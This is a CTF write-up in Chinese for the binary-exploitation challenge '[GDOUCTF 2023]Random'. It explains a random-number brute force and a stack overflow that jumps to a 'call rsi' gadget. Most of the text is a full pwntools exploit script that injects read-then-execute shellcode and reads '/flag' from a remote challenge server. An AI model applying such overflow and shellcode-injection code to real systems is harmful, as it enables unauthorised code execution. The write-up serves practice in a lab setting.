Problem: [GDOUCTF 2023]Random
思路
随机数直接爆破,然后有个call rsi
栈底是rsi
.text:0000000000400931 lea rax, [rbp+buf]
.text:0000000000400935 mov edx, 40h ; '@' ; nbytes
.text:000000000040093A mov rsi, rax ; buf我们直接在栈写payload
调用syscall read 读入bss
读进bss的就是我们的orw payload
完事了继续call 可以调用栈上的 或者汇编写应该都可以
EXP
from pwn import *
from LibcSearcher import *
#from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
io = remote("node5.anna.nssctf.cn",29191)
#io = process("./RANDOM")
e = ELF('./RANDOM')
#libc = ELF('./libc-2.31.so')
def get_addr():
return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def bug():
attach(io)
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num :io.recv(num)
ru = lambda delims, drop=True :io.recvuntil(delims, drop)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
ls = lambda data :log.success(data)
call_rsi = 0x400c23
bss = 0x6010b0
for i in range(50):
sla(b"num:",str(i))
io.recvline()
msg = io.recvline()
ls(msg)
if b"no" in msg:
pass
else:
ls("success get num")
break
code = """
xor rax,rax
mov rdi,0
mov rsi,0x6010b0
mov rdx,0xFFFF
syscall
call rsi
"""
asm_code = asm(code).ljust(0x20,b'\x00')
payload = asm_code + b'a'*8 +p64(call_rsi)
ls("asm_code=>"+hex(len(asm_code)))
#bug()
sla("your door",payload)
code1 = shellcraft.cat('/flag')
payload1 = asm(code1)
s(payload1)
io.interactive()总结
- 对该题的考点总结